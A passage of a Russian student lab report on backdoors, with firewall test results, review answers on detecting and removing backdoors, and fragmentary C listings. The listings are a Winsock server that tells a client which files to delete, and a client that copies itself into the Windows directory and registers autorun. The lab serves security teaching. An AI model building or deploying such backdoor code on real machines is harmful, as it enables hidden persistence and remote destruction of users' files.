        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC74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C740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BC74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740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BC740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Результат запуска</w:t>
      </w:r>
      <w:r w:rsidR="00BC740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> межсетевого экрана</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7CF3C" w14:textId="3244EE83" w:rsidR="00657FD7" w:rsidRDefault="00C65DA7" w:rsidP="00E21639">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:firstLine="709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Программа </w:t>
      </w:r>
      <w:r w:rsidR="00E21639">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>работает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E21639">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>через</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E21639">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>порт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000 (рис. 2), после его блокировки соединение сервера и клиента установить не </w:t>
      </w:r>
      <w:r w:rsidR="00E21639">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>удается</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E21639">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> После открытия порта и разблокировки приложения клиента все работает как прежде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3590B535" w14:textId="77777777" w:rsidR="00E21639" w:rsidRDefault="00E21639" w:rsidP="00E21639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772DED57" wp14:editId="59190E4A">
            <wp:extent cx="5857445" cy="883920"/>
            <wp:effectExtent l="0" t="0" r="0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8"/>
                    <a:srcRect l="16293" t="49943" r="19949" b="37229"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5942412" cy="89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600CF" w14:textId="2D807E98" w:rsidR="00660FE3" w:rsidRPr="004F1703" w:rsidRDefault="00E21639" w:rsidP="004F1703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BC740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C740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BC740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740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BC740F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Активные соединения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7257AA6B" w14:textId="21B7E9ED" w:rsidR="00D66DF8" w:rsidRDefault="00BA4AA0" w:rsidP="007A5066">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Результаты работы программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795E7E4" w14:textId="0F0DDC11" w:rsidR="00FD6ACE" w:rsidRPr="00FD6ACE" w:rsidRDefault="00FD6ACE" w:rsidP="007A5066">
      <w:r>
        <w:t>Результат работы программы при удалении существующего и несуществующего файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11377C7A" w14:textId="749C2061" w:rsidR="007A5066" w:rsidRDefault="00FD6ACE" w:rsidP="007A506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9329AB" wp14:editId="674000B4">
            <wp:extent cx="5835358" cy="16486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82" t="9330" r="37138" b="61851"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5893345" cy="166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917B6" w14:textId="5A8692CB" w:rsidR="00FD6ACE" w:rsidRPr="00FD6ACE" w:rsidRDefault="007A5066" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a5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A506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A5066">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007A506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5066">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5066">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007A5066">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5066">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Консоль се</w:t>
      </w:r>
      <w:r w:rsidR="00FD6ACE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5066">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60174798" w14:textId="162610E7" w:rsidR="007C27FE" w:rsidRDefault="00A143A8" w:rsidP="00B773BD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84DC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Контрольны</w:t>
      </w:r>
      <w:r w:rsidR="007B6776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84DC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1086BD9A" w14:textId="36A41272" w:rsidR="006212B8" w:rsidRDefault="006212B8" w:rsidP="00B773BD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="006212B8">
        <w:t>отайные ходы позволяют злоумышленнику скрытно получить несанкционированный доступ к данным или удаленно управлять вычислительной системой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A92C207" w14:textId="79A1822F" w:rsidR="006212B8" w:rsidRDefault="006212B8" w:rsidP="00B773BD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="006212B8">
        <w:t xml:space="preserve">Для того, чтобы обнаружить потайной ход, нужно регулярно осуществлять проверку открытых портов, а также установить специальную программу-монитор (например, Commodo Internet Security,), которая позволяет обнаруживать </w:t>
      </w:r>
      <w:r>
        <w:t>небезопасные</w:t>
      </w:r>
      <w:r w:rsidRPr="006212B8">
        <w:t xml:space="preserve"> программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190333EE" w14:textId="6106BF11" w:rsidR="006E4EAA" w:rsidRDefault="00F60ECC" w:rsidP="00B773BD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00F60ECC">
        <w:t>DoS (аббр. англ. Denial of Service «отказ в обслуживании»)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C558F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="00F60ECC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>хакерская атака на вычислительную систему с целью довести её до отказа</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F60ECC">
        <w:t>Этот тип атаки использует определенные ограничения пропускной способности, которые характерны для любых сетевых ресурсов</w:t>
      </w:r>
      <w:r>
        <w:t>. Для этого подойдут потайные ходы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F0540" w14:textId="77777777" w:rsidR="00200B2B" w:rsidRDefault="001D494D" w:rsidP="00200B2B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="001D494D">
        <w:t xml:space="preserve">Для удаления процесса программы-клиента из списка задач Диспетчера задач необходимо найти подозрительный процесс, проверить процесс на потребляемые им ресурсы, проверить исходный исполняемый файл, затем, убедившись в небезопасности этой программы и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t>том, что никакая важная информация не будет потеряна, можно "снять задачу"</w:t>
      </w:r>
      <w:r w:rsidR="005B4261" w:rsidRPr="005B4261">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Если этот способ не удался, то есть другой выход: нажать комбинацию клавиш Win + R для входа в редактор реестра и в появившемся поле ввести команду «regedit». Пройти</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>пути</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CURRENT</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>USER</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Software</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t xml:space="preserve">\ </w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CurrentVersion</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="001D494D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и удалить программу с автозагрузки, удаляя ключ из реестра. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C72BBC" w14:textId="77777777" w:rsidR="00F82B33" w:rsidRPr="00F82B33" w:rsidRDefault="00200B2B" w:rsidP="00F82B33">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Telnet — сетевой протокол для обмена текстовыми данными. Используется для удаленного управления оборудованием и серверами. Telnet-сервер входит в состав Windows в качестве службы, которая может быть настроена на постоянную работу, даже если никто не вошел в систему на сервере.</w:t>
      </w:r>
      <w:r w:rsidR="00F82B33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F82B33">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>После подключения удаленный пользователь должен ввести имя пользователя и пароль</w:t>
      </w:r>
      <w:r w:rsidR="00F82B33">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>После входа в систему пользователь видит командную строку, которую можно использовать, как будто эта командная строка была запущена локально в консоли сервера. Команды, вводимые в командной строке Telnet-клиента, отправляются на Telnet-сервер и выполняются там, как будто пользователь локально подключился к сеансу командной строки на сервере. Выходные данные выполняемых команд отправляются обратно на Telnet-клиент, где они отображаются на экране.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB6083" w14:textId="37CB7EAB" w:rsidR="005F2DA0" w:rsidRPr="00F82B33" w:rsidRDefault="005F2DA0" w:rsidP="00F82B33">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F82B33">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52322AD3" w14:textId="6B2375C4" w:rsidR="001415DE" w:rsidRPr="002D3798" w:rsidRDefault="00F82B33" w:rsidP="00816517">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F82B33">
        <w:t>В ходе лабораторной работы, были приобретены навыки по анализу структуры, функциональности и угроз специально встраиваемого дефекта программного продукта – потайного хода, а также были изучены методы защиты от уязвимости такого вида.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Были реализованы программы сервера и клиента, при помощи которых было успешно проведено удаление файла на компьютере-клиенте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADC7DE9" w14:textId="77777777" w:rsidR="005F2DA0" w:rsidRDefault="005F2DA0" w:rsidP="007753D9">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770D2860" w14:textId="015050CE" w:rsidR="00003D46" w:rsidRDefault="00003D46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</w:p>
    <w:p w14:paraId="0138B1C0" w14:textId="77777777" w:rsidR="009150C4" w:rsidRPr="00D11CC3" w:rsidRDefault="009150C4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</w:p>
    <w:p w14:paraId="6A034C89" w14:textId="77777777" w:rsidR="00657CE0" w:rsidRDefault="00657CE0" w:rsidP="00D73C4E">
      <w:pPr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/>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C77B5" w14:textId="77777777" w:rsidR="00657CE0" w:rsidRDefault="00657CE0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1A18FDE6" w14:textId="1B9C24CC" w:rsidR="005F2DA0" w:rsidRDefault="00D73C4E" w:rsidP="00D73C4E">
      <w:pPr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А</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF5884" w14:textId="70398CB7" w:rsidR="001322E9" w:rsidRPr="001322E9" w:rsidRDefault="001322E9" w:rsidP="00D73C4E">
      <w:pPr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программы «</w:t>
      </w:r>
      <w:r w:rsidR="009A3A15">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Сервер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF0194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</w:p>
    <w:p w14:paraId="411C77C9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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C3ED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&lt;WinSock2.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4874DD95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657E9C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256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB70C93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PORT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8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A3E7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA431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1E06CE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comment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lib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"Ws2_32.lib"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9F7E12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849616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removefile(</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3A1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client_socket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A7EC7CB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filename[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MAXFILENAME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 = { 0 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC3B60C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"Укажите путь к файлу для удаление на клиент-устройстве\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2BDB94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"Для закрытия введите: end\n"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C9381ED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gets_s(filename,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1EC2DAC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(strcmp(filename,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"end"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0)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"end"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A111B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send(</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3A1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client_socket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filename,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(filename), 0);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отправляет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сокету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14:paraId="7A32CCA9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"done"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9E26E67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EB21466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C562A0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4F65583C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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF6D3E7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command =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2C4A85" w14:textId="77777777" w:rsidR="009A3A15" w:rsidRPr="001931B0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SetConsoleCP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(1251);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B337EB3" w14:textId="77777777" w:rsidR="009A3A15" w:rsidRPr="001931B0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SetConsoleOutputCP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(1251);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21905D37" w14:textId="77777777" w:rsidR="009A3A15" w:rsidRPr="001931B0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54D133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WSADATA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ws;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//структура, в которую будут записаны сведения о сокете</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA54EC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(WSAStartup(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MAKEWORD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(2, 2), &amp;ws) != 0)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//инициализация сокета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8DD84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EE6ED7C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"WSAStartup failed"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31BAC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AD6A97A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3070A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5FA85D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s; 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создание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</w:p>
    <w:p w14:paraId="31CAD9DE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 = socket(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AF_INET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SOCK_STREAM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0);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семейство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адересов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протокол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ip),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связи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TCP)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протокол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(0,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тк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af_inet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14EA9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77C37A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SOCKADDR_IN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sa;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//структура для параметров сокета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492CA07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memset(&amp;sa, 0,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(sa));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D5CEA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sa.sin_family = </w:t>
      </w:r>
      <w:r w:rsidRPr="009A3A1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AF_INET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C245EA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sa.sin_port = htons(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PORT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//порт для взаимодейтсвия по сети с другим приложением</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E00F1BC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14:paraId="254676F7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bind(s, (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sockaddr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*)&amp;sa,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(sa));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привязка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адреса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сокету</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4EA804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listen(s, 100);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//перевод в ожидание входящего соединения </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33906377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44A70B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SOCKET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client_socket;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//создание и инициализация клинтского сокета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C93087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SOCKADDR_IN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client_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42579B96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client_addr_size =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(client_addr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F89CBD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1DA1D0E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Ожидание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соединения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...\n"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3D9253B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(client_socket = accept(s, (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A3A1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sockaddr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*)&amp;client_addr, &amp;client_addr_size)) {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случае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успеха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возвращает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нового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</w:p>
    <w:p w14:paraId="1C76426B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Соединение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установлено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\n"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DED19E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command = removefile(client_socket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C96EE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(strcmp(command,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"end"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0)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3DD6FE1B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(recv(client_socket, &amp;result,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(result), 0) &gt; 0) {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принимает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</w:p>
    <w:p w14:paraId="7BDF1CE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(result ==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9640A74" w14:textId="77777777" w:rsidR="009A3A15" w:rsidRPr="001931B0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!\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DF1E3D3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53BDEDC4" w14:textId="77777777" w:rsid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при удалении файла!\n"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14:paraId="3857696C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 = removefile(client_socket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C741952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(strcmp(command, </w:t>
      </w:r>
      <w:r w:rsidRPr="009A3A1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"end"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0) </w:t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5CFC2465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0D2D14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8731C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closesocket(s);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закрываем</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3A1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E87FF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A3A1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04042B84" w14:textId="77777777" w:rsidR="009A3A15" w:rsidRPr="009A3A15" w:rsidRDefault="009A3A15" w:rsidP="009A3A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A3A1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6F32D1E" w14:textId="2FA56E1D" w:rsidR="009A3A15" w:rsidRPr="009A3A15" w:rsidRDefault="009A3A15" w:rsidP="009A3A15">
      <w:pPr>
        <w:ind w:firstLine="0"/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Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3A15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программы</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3A15">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Клиент</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3A15">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747D149F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_WINSOCK_DEPRECATED_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D04DB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</w:p>
    <w:p w14:paraId="26003162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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70733EC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&lt;WinSock2.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103BA798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&lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B99234C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CEBF37A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256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E85322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PORT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8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CA0197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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABC735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IP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"192.168.0.104"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660635C9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STRLEN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 (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(x)/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- 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A51D7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32553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comment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D11CC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lib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"ws2_32.lib"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FBC39F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8C7DC8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autorun() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C24564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HKEY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hKey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//переменная, получающая описатель открытого раздела</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECB7BD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szWinPath[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14:paraId="7A51A027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TCHAR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szExeName[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14:paraId="2879F7D9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GetModuleFileName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szExeName,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STRLEN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(szExeName));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A26071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GetWindowsDirectory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(szWinPath,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STRLEN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(szWinPath)) == 0) {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записывает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буфер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путь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каталога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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEACD3A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defERROR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7DD01C08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14:paraId="33D069AD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lstrcat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(szWinPath,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L"\\клиент.exe"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//добавляет в строку, на которую указывает первый аргумент, строку, на которую указывает второй</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72D49B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(0 ==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CopyFile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(szExeName, szWinPath, 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19533872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A923BD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BCCD795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776BBB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RegOpenKeyEx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открывает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раздел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реестра</w:t>
